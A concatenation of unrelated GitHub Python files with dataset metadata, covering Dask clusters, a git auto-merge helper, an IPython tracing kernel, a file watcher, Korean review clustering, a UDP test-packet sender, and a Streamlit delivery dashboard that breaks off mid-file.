= Gateway(\n                address=self.gateway_registry[site],\n                auth=authobj,\n            )\n            # get new cluster object\n            self.cluster[site] = self.gateway[site].new_cluster(\n                worker_cores=1,\n                worker_memory=1,\n                image=\"registry.eodc.eu/eodc/dedl_demo:1.0\",\n            )\n            self.cluster[site].adapt(\n                minimum=self.cluster_scale_limits[site][\"min\"],\n                maximum=self.cluster_scale_limits[site][\"max\"],\n            )\n            self.client[site] = Client(self.cluster[site], set_as_default=False)\n\n    def get_cluster_url(self):\n        for site in self.gateway_registry:\n            print(self.cluster[site].dashboard_link)\n\n    def shutdown(self):\n        for site in self.gateway_registry:\n            self.cluster[site].close()\n
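\n\n# A minimal usage sketch, left commented out because it prompts for a password\n# and opens network connections to the gateways above:\n# dc = DaskCluster(\"demo\")\n# auth = dc.login(\"my-username\")\n# dc.create_cluster(auth)\n# dc.get_cluster_url()\n# dc.shutdown()\n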
","repo_name":"eodcgmbh/DEDL-Demonstrator","sub_path":"dedl/services/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"2407626093","text":"import argparse\nimport subprocess\n\n# Assume byte encoding to be \"utf-8\" compatible.\nENCODING = \"utf-8\"\n\n\ndef parser():\n    \"\"\"\n    Parses arguments from the command line.\n    \"\"\"\n    parser = argparse.ArgumentParser(description=\"auto merge with comments\")\n\n    parser.add_argument(\n        \"-u\", \"--use\", help=\"SHA1 commit preference hash.\", required=True)\n    parser.add_argument(\"-c\", \"--commitify\",\n                        help=\"SHA1 commit comment hash.\", required=True)\n    parser.add_argument(\n        \"-b\", \"--branch\", help=\"Output branch name\", required=True)\n    parser.add_argument(\n        \"-p\", \"--prefix\", help=\"Prefix String of the comment.\", required=True)\n\n    arguments = parser.parse_args()\n\n    return arguments\n\n\ndef evaluate_file(changed_file, prefix):\n    \"\"\"\n    Evaluates the changed_file and outputs the list of new lines for the\n    file.\n\n    Args:\n        changed_file: The file to be evaluated.\n        prefix: The comment prefix of the commitify_branch.\n\n    Returns:\n        List of new lines for the changed_file.\n    \"\"\"\n    # Constants.\n    PREFERENCE_ARROW = \">>>>>>>\"\n    DIVIDER = \"=======\"\n    COMMITIFY_ARROW = \"<<<<<<<\"\n\n    commitify_flag = False\n    new_file_lines = []\n    with open(changed_file, \"r\") as file_lines:\n        for line in file_lines:\n            if ((PREFERENCE_ARROW in line) or (COMMITIFY_ARROW in line)):\n                commitify_flag = False\n                continue\n            elif (DIVIDER in line):\n                commitify_flag = True\n                continue\n\n            if (commitify_flag):\n                new_file_lines.append(prefix + line)\n            else:\n                new_file_lines.append(line)\n\n    return new_file_lines\n\n\ndef write_new_file(changed_file, new_file_lines):\n    \"\"\"\n    Overwrite the changed_file with a list of lines.\n\n    Args:\n        changed_file: The file name to overwrite.\n        new_file_lines: The List of lines to write.\n\n    Returns:\n        Nothing.\n    \"\"\"\n    with open(changed_file, \"w\") as file_lines:\n        for line in new_file_lines:\n            file_lines.write(line)\n\n\ndef update_files(changed_files, prefix):\n    \"\"\"\n    Scans a list of files and resolves the merge changes.\n\n    Args:\n        changed_files: The list of files that have been changed.\n        prefix: The comment prefix to append to the commitify\n                branch.\n\n    Returns:\n        Nothing.\n    \"\"\"\n    for changed_file in changed_files:\n        if (changed_file == \"\"):\n            break\n\n        new_file_lines = evaluate_file(changed_file, prefix)\n        write_new_file(changed_file, new_file_lines)\n\n\ndef auto_merge(preference_branch, commitify_branch, output_branch, prefix):\n    \"\"\"\n    Performs the auto_merge function.\n\n    Args:\n        preference_branch: The branch to take preference of changes.\n        commitify_branch: The branch to comment out changes with\n                          supplied prefix.\n        output_branch: The branch where to output the merge files.\n        prefix: The prefix for the comment of the supplied\n                comment.\n\n    Returns:\n        Nothing.\n    \"\"\"\n    # Switch to output_branch.\n    subprocess.run([\"git\", \"checkout\", output_branch])\n\n    # Begin to merge branches.\n    subprocess.run([\"git\", \"merge\", preference_branch, commitify_branch])\n\n    # Get changed files name\n    changed_files_command = subprocess.run(\n        [\"git\", \"diff\", \"--name-only\", \"--diff-filter=U\"], stdout=subprocess.PIPE)\n    changed_files = changed_files_command.stdout.decode(ENCODING).split(\"\\n\")\n\n    update_files(changed_files, prefix)\n\n\ndef main():\n    \"\"\"\n    Driver Function.\n    \"\"\"\n    arguments = parser()\n\n    auto_merge(arguments.use, arguments.commitify,\n               arguments.branch, arguments.prefix)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"lamdav/AdvancedGit","sub_path":"homework04/src/auto_merge_with_comments.py","file_name":"auto_merge_with_comments.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26587823589","text":"from __future__ import absolute_import\n\nfrom ipykernel.ipkernel import IPythonKernel\nfrom networkx.readwrite import json_graph\nfrom traitlets import Bool, Enum, Instance, Type, default\n\nfrom ..core.annotator import Annotator\nfrom 
..core.flow_graph import flow_graph_to_graphml\nfrom ..core.flow_graph_builder import FlowGraphBuilder\nfrom ..core.graphml import write_graphml_str\nfrom ..core.remote_annotation_db import RemoteAnnotationDB\nfrom ..trace.tracer import Tracer\nfrom .serialize import object_to_json\nfrom .shell import FlowGraphIPythonShell\nfrom .slots import get_slots\n\n\nclass FlowGraphIPythonKernel(IPythonKernel):\n \"\"\" IPython kernel with support for program analysis and object inspection.\n \"\"\"\n \n # Whether to simplify the flow graph by removing some/all outputs.\n # See `flow_graph.flow_graph_to_graphml`.\n flow_graph_outputs = Enum(\n ['all', 'simplify', 'none'], default_value='simplify').tag(config=True)\n \n # Whether to store annotated slots of objects in the flow graph.\n # See `flow_graph_builder.FlowGraphBuilder`.\n flow_graph_slots = Bool(True).tag(config=True)\n \n # Annotator for objects and functions.\n annotator = Instance(Annotator)\n \n # `IPythonKernel` traits.\n shell_class = Type(FlowGraphIPythonShell)\n \n # Private traits.\n _builder = Instance(FlowGraphBuilder)\n _tracer = Instance(Tracer, args=())\n _trace_flag = Bool()\n\n # `FlowGraphIPythonKernel` interface\n \n def get_object(self, obj_id):\n \"\"\" Get a tracked object by ID.\n \"\"\"\n return self._tracer.object_tracker.get_object(obj_id)\n \n def get_object_id(self, obj):\n \"\"\" Get the ID of a tracked object.\n \"\"\"\n return self._tracer.object_tracker.get_id(obj)\n \n # `KernelBase` interface\n \n def do_execute(self, code, silent, *args, **kwargs):\n \"\"\" Reimplemented to perform tracing.\n \"\"\"\n # Do execution, with tracing unless the execution request is `silent`.\n self._builder.reset()\n self._trace_flag = not silent\n reply_content = super(FlowGraphIPythonKernel, self).do_execute(\n code, silent, *args, **kwargs)\n \n # Add flow graph as a payload.\n if self._trace_flag and reply_content['status'] == 'ok':\n graph = self._builder.graph\n graphml = flow_graph_to_graphml(\n graph, outputs=self.flow_graph_outputs)\n data = write_graphml_str(graphml, prettyprint=False)\n payload = {\n 'source': 'flow_graph',\n 'mimetype': 'application/graphml+xml',\n 'data': data,\n }\n reply_content['payload'].append(payload)\n \n return reply_content\n \n def inspect_request(self, stream, ident, parent):\n \"\"\" Reimplemented to handle inspect requests for annotated objects.\n \"\"\"\n content = parent['content']\n if 'object_id' not in content:\n return super(FlowGraphIPythonKernel, self).inspect_request(\n stream, ident, parent)\n\n obj_id = content['object_id']\n obj = self.get_object(obj_id)\n if obj is None:\n reply_content = {\n 'status': 'ok',\n 'found': False,\n 'data': {},\n 'metadata': {},\n }\n else:\n inspect_data = get_slots(obj, content['slots'])\n reply_content = {\n 'status': 'ok',\n 'found': True,\n 'data': {\n 'application/json': object_to_json(inspect_data),\n },\n 'metadata': {},\n }\n \n msg = self.session.send(stream, 'inspect_reply',\n reply_content, parent, ident)\n self.log.debug(\"%s\", msg)\n \n # Trait initializers\n \n @default('annotator')\n def _annotator_default(self):\n # Inherit database config from kernel.\n db = RemoteAnnotationDB(parent=self)\n return Annotator(db=db)\n \n @default('_builder')\n def _builder_default(self):\n builder = FlowGraphBuilder(\n annotator=self.annotator,\n store_slots=self.flow_graph_slots,\n )\n\n def handler(changed):\n event = changed['new']\n if event:\n builder.push_event(event)\n self._tracer.observe(handler, 'event')\n \n return 
builder\n","repo_name":"IBM/pyflowgraph","sub_path":"flowgraph/kernel/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"7130448154","text":"import os\nimport time\nimport threading\n\nfrom .event import Event\n\n\nclass Observer(threading.Thread):\n    \"\"\"Observe changes in the file system\n    \"\"\"\n    def __init__(self):\n        \"\"\"Class instantiation\n        \"\"\"\n        super().__init__()\n        self.signatures = {}\n        self.handlers = {}\n        self.terminated = False\n\n    def add_handler(self, path, handler):\n        \"\"\"Add a path to the watch queue\n        \"\"\"\n        self.signatures[path] = self.get_path_signature(path)\n        self.handlers[path] = handler\n\n    def get_path_signature(self, path):\n        \"\"\"Generate a unique signature for the files contained in path\n        \"\"\"\n        if not os.path.exists(path):\n            return None\n        if os.path.isdir(path):\n            merge = {}\n            for root, dirs, files in os.walk(path):\n                for name in files:\n                    full_name = os.path.join(root, name)\n                    merge[full_name] = os.stat(full_name)\n            return merge\n        else:\n            return os.stat(path)\n\n    def check(self):\n        \"\"\"Check whether any watched file has changed\n        \"\"\"\n        for (path, handler) in self.handlers.items():\n            current_signature = self.signatures[path]\n            new_signature = self.get_path_signature(path)\n            if new_signature != current_signature:\n                self.signatures[path] = new_signature\n                handler.on_change(Event(path))\n\n    def run(self):\n        \"\"\"Main loop of the observer's thread: looks for changes in one of the paths and calls on_change of the EventHandler\n        \"\"\"\n        while not self.terminated:\n            self.check()\n            time.sleep(0.2)\n\n    def stop(self):\n        \"\"\"Stop thread loop\n        \"\"\"\n        self.terminated = True\n
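\n\n# A minimal usage sketch, assuming a handler object that exposes an\n# on_change(event) method (not defined in this module):\n# observer = Observer()\n# observer.add_handler(\"/tmp/watched\", handler)\n# observer.start()  # run() loop inherited from threading.Thread\n# observer.stop()\n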
","repo_name":"SolutionsCloud/apidoc","sub_path":"apidoc/lib/fswatcher/observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"32"} +{"seq_id":"74944033370","text":"# Widely used for chatbots. Using a Hugging Face model, let's convert Korean sentences into numeric vectors and judge positive/negative sentiment.\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.cluster import KMeans\nimport json\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nmodel = SentenceTransformer('jhgan/ko-sroberta-multitask')\nsentences = [\"안녕하세요?\", \"한국어 문장 임베딩을 위한 버트 모델입니다.\"]\nembeddings = model.encode(sentences)\n\n#print(embeddings)\n\nsentences = ['한 남자가 음식을 먹는다.',\n             '한 남자가 빵 한 조각을 먹는다.',\n             '그 여자가 아이를 돌본다.',\n             '한 남자가 말을 탄다.',\n             '한 여자가 바이올린을 연주한다.',\n             '두 남자가 수레를 숲 속으로 밀었다.',\n             '한 남자가 담으로 싸인 땅에서 백마를 타고 있다.',\n             '원숭이 한 마리가 드럼을 연주한다.',\n             '치타 한 마리가 먹이 뒤에서 달리고 있다.',\n             '한 남자가 파스타를 먹는다.',\n             '고릴라 의상을 입은 누군가가 드럼을 연주하고 있다.',\n             '치타가 들판을 가로 질러 먹이를 쫓는다.']\n\nembeddings = model.encode(sentences)\n\n# set the number of clusters for KMeans\nnum_clusters = 5\nclustering_model = KMeans(n_clusters=num_clusters)\n# fit the clustering model\nclustering_model.fit(embeddings)\n# keep the labels\ncluster_assignment = clustering_model.labels_\n\nclustered_sentences = [[] for i in range(num_clusters)]\n# for sentence_id, cluster_id in enumerate(cluster_assignment):\n#     clustered_sentences[cluster_id].append(sentences[sentence_id])\n#\n# for i, cluster in enumerate(clustered_sentences):\n#     print(\"Cluster \", i+1)\n#     print(cluster)\n#     print(\"\")\n\n# Main part: load the .csv saved by Crawling.py and cluster the Monster Hunter Rise reviews.\ndf = pd.read_csv('../Cluster/reviews_ko.csv')\n\ncorpus = df['review'].values.tolist()\n\nembeddings = model.encode(corpus)\n\nnum_clusters = 3\nclustering_model = KMeans(n_clusters=num_clusters)\nclustering_model.fit(embeddings)\ncluster_assignment = clustering_model.labels_\n\nclustered_sentences = [[] for i in range(num_clusters)]\nfor sentence_id, cluster_id in enumerate(cluster_assignment):\n    clustered_sentences[cluster_id].append(corpus[sentence_id])\n\nfor i, cluster in enumerate(clustered_sentences):\n    print('Cluster %d (%d)' % (i+1, len(cluster)))\n    print(cluster)\n    print('')\ndf['voted_up'].value_counts().plot(kind='bar', title='Voted Up')\nplt.title(\"Monster Hunter Rise Like/Hate\")\n\nplt.show()
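\n\n# A quick, commented-out sketch for checking how balanced the clusters are\n# without printing every review; Counter comes from the standard library.\n# from collections import Counter\n# print(Counter(cluster_assignment))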
","repo_name":"Yuminkyeong/2022Pytorch","sub_path":"Cluster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25719082710","text":"\"\"\"You type a subid on the command line and it prints statistics for that subid\r\nin the following format:\r\nTotal orders: xxx (+)\r\nLargest order: for the amount of xxx rubles on offer xxx (+)\r\nAverage number of orders per day: xxx\r\nTotal commission paid out for the subid: total commission amount. (+)\r\nNumber of orders awaiting payout: count (+)\r\n\"\"\"\r\nimport pub_api_1\r\n\r\n\r\ndef file(raw, subid):\r\n    file = []\r\n    for lst in raw:\r\n        if lst[5] == subid:\r\n            file.append(lst)\r\n    return file\r\n\r\n\r\ndef max_order(file):\r\n    prices = []\r\n    for i in range(len(file)):\r\n        if file[i][1] is not None:\r\n            prices.append(file[i][1])\r\n        else:\r\n            prices.append(0.0)\r\n    zakaz = 0\r\n    for order in file:\r\n        if order[1] == max(prices):\r\n            zakaz = order[6]\r\n    return [max(prices), zakaz]\r\n\r\n\r\ndef commission_approved(file):\r\n    s = 0\r\n    for order in file:\r\n        if order[7] == 'approved' and order[4] == 1:\r\n            s += order[3]\r\n    return s\r\n\r\n\r\ndef amount_payout(file):\r\n    i = 0\r\n    for order in file:\r\n        if order[4] == 1:\r\n            i += 1\r\n    return i\r\n\r\n\r\nsubid = input('Введите subid (Тилли/Вилли/Дилли): ')\r\nif subid not in ['Тилли', 'Вилли', 'Дилли']:\r\n    print('Не балуйся! Запусти программу снова.')\r\nelse:\r\n    raw = pub_api_1.orders(pub_api_1.data())\r\n    file = file(raw, subid)\r\n    print(f'Всего заказов: {len(file)}')\r\n    print(f'Самый крупный заказ: на сумму {max_order(file)[0]} рублей по офферу {max_order(file)[1]}')\r\n    print(f'Среднее количество заказов в день: {len(file)/30}')\r\n    print(f'Общая сумма выплаченной комиссии по subid: {commission_approved(file)}')\r\n    print(f'Количество заказов, по которым ожидается выплата: {amount_payout(file)}')\r\n","repo_name":"JuliaSavochkina/Git_homeworks","sub_path":"pub_api_2.py","file_name":"pub_api_2.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38557330893","text":"\nclass Light():\n\n\tdescription = 'A filming light'\n\n\tdef __init__( self, name ):\n\t\tself.name = name\n\t\tself.brightness = 0\n\t\tself.colorTemperature = 0\n\t\tself.blueBrightness = 0\n\t\tself.redBrightness = 0\n\t\tself.hue = 0\n\n\tdef update( self, **kwargs ):\n\t\tself.brightness = kwargs.get('brightness', self.brightness)\n\t\tself.colorTemperature = kwargs.get('colorTemperature', self.colorTemperature)\n\t\tself.blueBrightness = kwargs.get('blueBrightness', self.blueBrightness)\n\t\tself.redBrightness = kwargs.get('redBrightness', self.redBrightness)\n\t\tself.hue = kwargs.get('hue', self.hue)\n\n\tdef as_dict( self ):\n\t\treturn dict(\n\t\t\tname = self.name,\n\t\t\tbrightness = self.brightness,\n\t\t\tcolorTemperature = self.colorTemperature,\n\t\t\tblueBrightness = self.blueBrightness,\n\t\t\thue = self.hue,\n\t\t\tredBrightness = self.redBrightness\n\t\t)\n\nlights = dict(\n\tleft = Light('left'),\n\tright = Light('right')\n)\n\ndef listAll():\n\tjsonable = {}\n\tfor name in lights:\n\t\tjsonable[name] = {}\n\t\tjsonable[name]['url'] = '/lights/%s' % name\n\t\tjsonable[name]['name'] = name\n\t\tjsonable[name]['description'] = lights[name].description\n\treturn jsonable\n\ndef getAll():\n\tjsonables = []\n\tfor name in lights:\n\t\tjsonables.append( lights[name].as_dict() )\n\treturn jsonables\n\ndef get( name ):\n\treturn lights[name].as_dict()\n\ndef post( light, name ):\n\n\t_light = lights[name]\n\t_light.update( **light )\n\n\treturn _light.as_dict() \n","repo_name":"ippo615/experiments","sub_path":"swagger.io/04-light-rig/controllers/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"428950686","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 
-*-\r\n\r\n##################################################\r\n## UDP Sender\r\n##################################################\r\n## GNU Affero General Public License v3.0\r\n##################################################\r\n## Author: Hartwig Tronnier\r\n## Co-Author: Eric Sobian\r\n## Version: 1.1.1\r\n## Maintainer: Hartwig Tronnier\r\n## Email: hartwig-git@online.de\r\n## Status: BETA\r\n##################################################\r\n##\r\n## Purpose of this program:\r\n## send a constant stream of sequentially numbered udp packets to a destination ip/port\r\n## on the receiver side the partner program 'udplisten' watches for these packets \r\n## and reports any missing/duplicate/out-of-sequence packets\r\n##\r\n## We use this in network environments to measure convergence times in case of redundancy failovers\r\n##\r\n## Typically, each test client sends to every other client and listens for every other client\r\n##\r\n###################################################\r\n\r\nimport asyncio, sys, getopt\r\nimport socket\r\nimport struct\r\nfrom threading import Timer\r\nfrom time import sleep\r\n\r\n## The asyncio construct is used to send timed packets without blocking the cpu\r\n## since my use case involved starting many instances on each computer\r\n## I used 10 instances on Raspberry Pi 3, Eric had 110 instances on virtual x86 machines\r\n\r\n \r\n@asyncio.coroutine\r\ndef ping(mysock):\r\n cnt=1\r\n while True:\r\n yield from asyncio.sleep(.009)\r\n message = struct.pack('>L',cnt)\r\n mysock.sendto(message,(UDP_IP,UDP_PORT))\r\n cnt += 1\r\n \r\n \r\n \r\nUDP_IP = \"::1\"\r\nUDP_PORT = 0\r\nUDP_PROTO=socket.AF_INET6\r\n\r\nusage = \"udpsend -a IP(v6)-address -p port -v Version(4 or 6)\"\r\n\r\n \r\n\r\n \r\n\r\ntry:\r\n opts, args = getopt.getopt(sys.argv[1:], \"ha:p:v:\",[\"help\",\"address=\",\"port=\",\"version=\"])\r\nexcept getopt.GetoptError:\r\n print (usage)\r\n sys.exit(2)\r\nfor opt, arg in opts:\r\n if opt in ('-h','--help'):\r\n print ('UDP sender:\\n')\r\n print ('sends numbered packets to
:\\n')\r\n        print (usage)\r\n        sys.exit(2)\r\n    elif opt in (\"-a\",\"--address\"):\r\n        UDP_IP = arg\r\n    elif opt in (\"-p\",\"--port\"):\r\n        UDP_PORT = int(arg)\r\n    elif opt in (\"-v\",\"--version\"):\r\n        if int(arg)==4:\r\n            UDP_PROTO=socket.AF_INET\r\n\r\nif UDP_PORT==0:\r\n    print (\"No port given!\\n udplisten -o outfile -p port\")\r\n    sys.exit(2)\r\n\r\n    \r\nprint(\"UDP send to \",UDP_IP,\":\",UDP_PORT,\" press ^C to abort\\n\") \r\nsock = socket.socket(UDP_PROTO, socket.SOCK_DGRAM) # UDP\r\n\r\nloop = asyncio.get_event_loop()\r\ntry:\r\n    asyncio.ensure_future(ping(sock))\r\n    loop.run_forever()\r\nexcept KeyboardInterrupt:\r\n    print(\"Stopping ...\")\r\nfinally:\r\n    loop.close()\r\n    sleep(1)\r\n    sock.close()\r\n\r\n","repo_name":"hartwigt/udpping","sub_path":"udpsend_v1.1.1.py","file_name":"udpsend_v1.1.1.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38221196643","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nx = np.array([10, 20, 30, 40, 50, 60])\r\ny = np.array([200, 400, 600, 800, 1000, 1200])\r\n\r\nfont1 = {'family': 'Arial', 'color': 'red', 'size': 20}\r\nfont2 = {'family': 'Arial', 'color': 'black', 'size': 15}\r\n\r\nplt.title(\"Rice Consumption\",fontdict=font1)\r\nplt.xlabel(\"No.of people(in millions)\", fontdict=font2)\r\nplt.ylabel(\"Amount of rice consumed(in tonnes)\",fontdict=font2)\r\n\r\nplt.grid(color = 'green',ls = '--',lw = 0.5)\r\nplt.plot(x,y)\r\nplt.show()\r\n\r\n\r\n","repo_name":"joeljohngeorge/matplot-tutorial-codes","sub_path":"labelplot.py","file_name":"labelplot.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22746667495","text":"# Libraries\nfrom haversine import haversine\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# importing libraries\nimport pandas as pd\nimport streamlit as st\nfrom PIL import Image\nimport folium\nfrom streamlit_folium import folium_static\n\nst.set_page_config( page_title='Visão Empresa', page_icon='📈', layout='wide' )\n\n# --------------------------------------------------#\n# Functions \n# --------------------------------------------------#\n\n# country_maps function\ndef country_maps( df1 ):\n    \n    \"\"\"\n    country_maps(df1) receives a DataFrame object called df1 as a parameter. The function does the following:\n\n    Creates a new DataFrame object called df_aux holding the 'City', 'Road_traffic_density', 'Delivery_location_latitude' and 'Delivery_location_longitude' columns of df1.\n    The df_aux data is grouped by 'City' and 'Road_traffic_density', and the median of the other columns is computed.\n    Creates a Folium Map object.\n    Iterates over each row of df_aux, adding a marker on the Folium map for every delivery point.\n    The marker popup carries the 'City' and 'Road_traffic_density' information for each delivery point.\n    Displays the map using folium_static.\n    Returns None.\n\n    \"\"\"\n    \n    df_aux = ( df1.loc[:, ['City', 'Road_traffic_density', 'Delivery_location_latitude', 'Delivery_location_longitude']]\n                  .groupby( ['City', 'Road_traffic_density'] )\n                  .median()\n                  .reset_index() )\n\n\n    map = folium.Map()\n\n    for index, location_info in df_aux.iterrows():\n        folium.Marker( [location_info['Delivery_location_latitude'],\n                       location_info['Delivery_location_longitude']],\n                       popup=location_info[['City', 'Road_traffic_density']] ).add_to( map)\n\n    folium_static(map, width=1024 , height=600 )    \n    return None \n#--------------------------------------------------------------#\n# order_share_by_week function\n\ndef order_share_by_week( df1 ) : \n    \"\"\"\n    order_share_by_week(df1) receives a DataFrame object called df1 as a parameter. The function does the following:\n\n    Creates an object df_aux01 holding the 'ID' and 'week_of_year' columns of df1, grouped by 'week_of_year',\n    counting the number of orders placed in each week.\n    Creates an object df_aux02 holding the 'Delivery_person_ID' and 'week_of_year' columns of df1,\n    grouped by 'week_of_year', counting the number of unique couriers in each week.\n    Creates an object df_aux combining df_aux01 and df_aux02 through an inner merge on the 'week_of_year' column.\n    Creates a new column in df_aux called 'order_by_deliver' that divides the number of orders by the number of unique couriers in each week.\n    Creates a fig object with the Plotly Express library.\n    The plotted line chart shows how the ratio of orders to couriers evolves week by week.\n    At the end, the function returns the fig object.\n    \"\"\"\n    # number of orders / unique number of couriers \n    df_aux01 = df1.loc[:, ['ID', 'week_of_year']].groupby( 'week_of_year' ).count().reset_index()\n    df_aux02 = df1.loc[:, ['Delivery_person_ID', 'week_of_year']].groupby( 'week_of_year' ).nunique().reset_index()\n    df_aux = pd.merge( df_aux01, df_aux02, how='inner', on='week_of_year')\n    df_aux['order_by_deliver'] = df_aux['ID'] / df_aux['Delivery_person_ID']    \n    fig = px.line(df_aux, x='week_of_year', y='order_by_deliver')\n\n    return fig \n    \n#---------------------------------------------------------------------------------------------------------------#\n\n# order_by_week function\ndef order_by_week( df1 ):\n    \"\"\"\n    order_by_week(df1) receives a DataFrame object called df1 as a parameter. The function does the following:\n\n    Creates a new column in df1 called 'week_of_year' holding the week number that corresponds to the order date.\n    Creates an object teste holding the 'ID' and 'week_of_year' columns of df1, grouped by 'week_of_year',\n    counting the number of orders placed in each week.\n    Creates a fig object with the Plotly Express library.\n    The plotted line chart shows how the number of orders evolves week by week.\n    At the end, the function returns the fig object.\n    \"\"\"\n    # creating the week column \n    df1['week_of_year'] = df1['Order_Date'].dt.strftime( '%U' )\n    teste = df1.loc[:, ['ID', 'week_of_year']].groupby( 'week_of_year' ).count().reset_index()\n    fig = px.line( teste, x='week_of_year', y='ID' )\n    return fig\n\n#----------------------------------------------------------------------------------------------------------------#\n\n# traffic_order_city function\ndef traffic_order_city( df1 ):\n    \"\"\"\n    traffic_order_city(df1) receives a DataFrame object called df1 as a parameter. The function does the following:\n\n    Creates an object test holding the 'ID', 'City' and 'Road_traffic_density' columns of df1,\n    grouped by 'City' and 'Road_traffic_density', counting the orders for each combination of city and traffic density.\n    Creates a fig object with the Plotly Express library.\n    The plotted scatter chart shows the combinations of cities and traffic densities,\n    with the size of each point representing the number of orders in each combination and the color representing the city.\n    At the end, the function returns the fig object.\n    \"\"\"\n    \n    test = ( df1.loc[:, ['ID', 'City', 'Road_traffic_density']]\n                .groupby( ['City', 'Road_traffic_density'] )\n                .count()\n                .reset_index() )\n    fig = px.scatter( test, x='City', y='Road_traffic_density', size='ID', color='City')\n\n    return fig\n\n#----------------------------------------------------------------------------------------------------------------#\n\n# traffic_order_share function\ndef traffic_order_share( df1 ):\n    \"\"\"\n    traffic_order_share(df1) receives a DataFrame object called df1 as a parameter. The function does the following:\n\n    Creates an object df_aux holding the 'ID' and 'Road_traffic_density' columns of df1, grouped by 'Road_traffic_density',\n    counting the number of orders placed in each traffic density.\n    Computes the share of deliveries in each traffic density and stores it in a new column called 'entregas_perc' in df_aux.\n    Creates a pie chart with the Plotly Express library, showing the share of deliveries per traffic density.\n    At the end, the function returns the fig object.\n    \"\"\"\n    \n    df_aux = df1.loc[:, ['ID', 'Road_traffic_density']].groupby( 'Road_traffic_density' ).count().reset_index()    \n\n    df_aux['entregas_perc'] = df_aux['ID'] / df_aux['ID'].sum()\n\n    fig = px.pie( df_aux, values='entregas_perc', names='Road_traffic_density' )\n\n    return fig\n\n#----------------------------------------------------------------------------------------------------------------#\n\n# order_metric function\ndef order_metric( df1 ):\n    \"\"\"\n    The function receives a DataFrame object called df1 as a parameter and does the following:\n\n    Creates a list called coluna with the 'ID' and 'Order_Date' columns.\n    Creates an object df_aux holding the columns listed in coluna, grouped by 'Order_Date',\n    counting the number of orders placed on each date.\n    Creates a bar chart with the Plotly Express library, showing the number of orders placed per date.\n    At the end, the function returns the fig object.\n    \"\"\"\n    \n    coluna = ['ID', 'Order_Date']\n\n    # row selection \n    df_aux = df1.loc[:, coluna].groupby( ['Order_Date'] ).count().reset_index()\n\n    # Draw the chart \n    fig = px.bar( df_aux, x='Order_Date', y='ID')\n\n    return fig\n\n#----------------------------------------------------------------------------------------------------------------#\n\n# clean_code function\ndef clean_code( df1 ):\n    \"\"\" This function is responsible for cleaning the dataframe\n    \n    Cleaning steps:\n    1. Removal of NaN rows\n    2. Conversion of column types \n    3. Removal of whitespace from text variables\n    4. Formatting of the date column \n    5. Cleaning of the time column ( removing text from the numeric variable )\n    \n    Input: Dataframe\n    Output: Dataframe\n    \"\"\"\n    \n    ## Data cleaning \n    # 1. converting the Age column from text to number \n    linha_selecionada = (df1['Delivery_person_Age' ] != 'NaN ')\n    df1 = df1.loc[linha_selecionada, :].copy()\n\n    linha_selecionada = (df1['Road_traffic_density' ] != 'NaN ')\n    df1 = df1.loc[linha_selecionada, :].copy()\n\n    linha_selecionada = (df1['City' ] != 'NaN ')\n    df1 = df1.loc[linha_selecionada, :].copy()\n\n    linha_selecionada = (df1['Festival' ] != 'NaN ')\n    df1 = df1.loc[linha_selecionada, :].copy()\n\n    df1[ 'Delivery_person_Age'] = df1[ 'Delivery_person_Age' ].astype( int )\n\n    # 2. converting the Ratings column from text to decimal ( float )\n    df1['Delivery_person_Ratings'] = df1['Delivery_person_Ratings'].astype( float )\n\n    # 3. converting the Order_Date column from text to date\n    df1['Order_Date'] = pd.to_datetime( df1['Order_Date' ], format='%d-%m-%Y' )\n\n    # 4. converting multiple_deliveries from text to integer ( int )\n    linha_selecionada = (df1['multiple_deliveries'] != 'NaN ')\n    df1 = df1.loc[linha_selecionada, :].copy()\n    df1['multiple_deliveries'] = df1['multiple_deliveries'].astype( int )\n\n    # 5. Removing whitespace inside strings/text/object columns\n    df1.loc[:, 'ID'] = df1.loc[:, 'ID'].str.strip()\n    df1.loc[:, 'Road_traffic_density'] = df1.loc[:, 'Road_traffic_density'].str.strip()\n    df1.loc[:, 'Type_of_order'] = df1.loc[:, 'Type_of_order'].str.strip()\n    df1.loc[:, 'Type_of_vehicle'] = df1.loc[:, 'Type_of_vehicle'].str.strip()\n    df1.loc[:, 'City'] = df1.loc[:, 'City'].str.strip()\n    df1.loc[:, 'Festival'] = df1.loc[:, 'Festival'].str.strip()\n\n    # 6. Cleaning the Time_taken(min) column\n    df1['Time_taken(min)'] = df1['Time_taken(min)'].apply( lambda x: x.split( '(min)')[1] )\n    df1['Time_taken(min)'] = df1['Time_taken(min)'].astype( int )\n\n    return df1\n
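\n# Mini-example of cleaning step 6 above: \"(min) 24\".split( '(min)' )[1] yields\n# \" 24\", and int(\" 24\") == 24, so the column ends up as plain integers.\n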
